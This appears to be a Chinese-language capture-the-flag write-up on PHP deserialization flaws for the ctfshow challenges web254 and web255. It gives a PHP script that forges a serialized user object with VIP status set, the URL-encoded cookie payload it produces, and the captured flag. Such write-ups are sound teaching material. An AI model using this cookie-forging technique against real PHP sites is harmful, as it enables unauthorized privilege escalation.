2022/4/17
反序列化
反序列化漏洞的产生主要有以下两个原因:
1. unserialize 函数的参数可控。
2.存在魔法函数。
魔法函数
__construct,__destruct,__call,__callStatic,__get,__set,__isset,__unset,__sleep,__wakeup,__toString,__invoke,__set_state,__clone和__debuginfo等成员函数在PHP中被称为魔法函数。在命名自己的类方法时不能使用这些名称,除非是想使用其魔法函数的功能。
Web254
Playload:
?username=xxxxxx&password=xxxxxx
Web255
写一个php文件输出user序列化后的cookie
把题目粘贴到php文件把$isVip的值设置为ture
class ctfShowUser{
public $username='xxxxxx';
public $password='xxxxxx';
public $isVip=ture;
public function checkVip(){
return $this->isVip;
}
public function login($u,$p){
return $this->username===$u&&$this->password===$p;
}
public function vipOneKeyGetFlag(){
if($this->isVip){
global $flag;
echo "your flag is ".$flag;
}else{
echo "no vip, no flag";
}
}
}
echo urlencode (serialize (new ctfShowUser()));
//ctfshow反序列化漏洞web255
?>
访问发现:
O%3A11%3A%22ctfShowUser%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A8%3A%22password%22%3Bs%3A6%3A%22xxxxxx%22%3Bs%3A5%3A%22isVip%22%3Bs%3A4%3A%22ture%22%3B%7D
把这个值填入名为user的cookie
再把xxxxxx传入username和password
执行得到flag:
ctfshow{c0736abc-d51d-4ea5-8e88-c655dbfe5dea}